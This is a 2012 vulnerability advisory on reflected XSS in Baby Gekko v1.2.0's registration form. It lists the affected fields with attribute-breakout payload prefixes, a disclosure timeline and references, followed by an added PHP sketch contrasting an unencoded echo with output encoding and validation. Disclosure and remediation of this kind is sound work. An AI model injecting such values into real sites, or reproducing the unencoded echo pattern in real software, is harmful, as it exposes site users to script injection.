Advisory:           Baby Gekko v1.2.0 Multiple XSS vulnerabilities
Advisory ID:        SSCHADV2012-012
Author:             Stefan Schurtz
Affected Software:  Successfully tested on Baby Gekko v1.2.0
Vendor URL:         http://www.babygekko.com/
Vendor Status:      informed

==========================
Vulnerability Description
==========================

Baby Gekko v1.2.0 is prone to multiple Cross-Site scripting vulnerabilities

==================
PoC-Exploit
==================

http://[target]/gekkocms/users/action/register

Reflected XSS (Tested on WinXP with IE8)

Desired Username    '"/>
E-mail address      '"/>
Password            '"/>
Verify Password     '"/>
First Name          '"/>
Last Name           '"/>

Reflected XSS (Tested on WinXP with FF7.0.1 and FF12)

When the username or the e-mail already exists the following XSS are also possible!

Desired Username
E-mail address
Password            '"/>
Verify Password     '"/>
First Name          '"/>
Last Name           '"/>

=========
Solution
=========

-

====================
Disclosure Timeline
====================

05-May-2012 - vendor informed
05-May-2012 - vendor feedback

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-012.txt
http://www.babygekko.com/forum/index.php/topic,349.0.html
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5086.php
http://secunia.com/advisories/49023/
http://www.exploit-db.com/exploits/18827/
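
A mitigation sketch for the form fields listed under PoC-Exploit (an added example, not code from Baby Gekko or from the advisory author). It assumes the submitted values are written back into quoted value attributes of the registration form, which the '"/> prefix suggests; the field names, function names and validation patterns are hypothetical.

```php
<?php
// Added example, not Baby Gekko code. Field and function names are hypothetical.

// Encode a value for use inside a quoted HTML attribute.
// ENT_QUOTES encodes both ' and ", so the '"/> prefix cannot close the attribute.
function attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// "Before": the submitted value is echoed back unencoded (the reflected-XSS pattern).
function render_input_unsafe(string $name, string $value): string {
    return '<input type="text" name="' . $name . '" value="' . $value . '" />';
}

// "After": every dynamic part is encoded at the point of output.
function render_input(string $name, string $value): string {
    return '<input type="text" name="' . attr($name) . '" value="' . attr($value) . '" />';
}

// Server-side validation as a second layer; returns the names of rejected fields.
function validate_registration(array $post): array {
    $rejected = [];
    if (!preg_match('/\A[A-Za-z0-9_.-]{3,32}\z/', $post['username'] ?? '')) {
        $rejected[] = 'username';
    }
    if (filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL) === false) {
        $rejected[] = 'email';
    }
    foreach (['firstname', 'lastname'] as $field) {
        if (!preg_match('/\A[\p{L} .\'-]{1,64}\z/u', $post[$field] ?? '')) {
            $rejected[] = $field;
        }
    }
    return $rejected;
}

// Constructed sample input: the breakout prefix from the PoC plus a harmless marker.
$post = [
    'username'  => '\'"/>TEST',
    'email'     => '\'"/>TEST',
    'firstname' => '\'"/>TEST',
    'lastname'  => "O'Brien", // legitimate value containing a quote
];

echo render_input_unsafe('username', $post['username']), PHP_EOL;
echo render_input('username', $post['username']), PHP_EOL;
echo render_input('lastname', $post['lastname']), PHP_EOL;
echo 'rejected: ', implode(', ', validate_registration($post)), PHP_EOL;
```

Validation alone is not sufficient, as the legitimate apostrophe in the last name shows; the encoding at output is what keeps the value inside the attribute. Password and Verify Password are best not written back into the form at all after a failed submission.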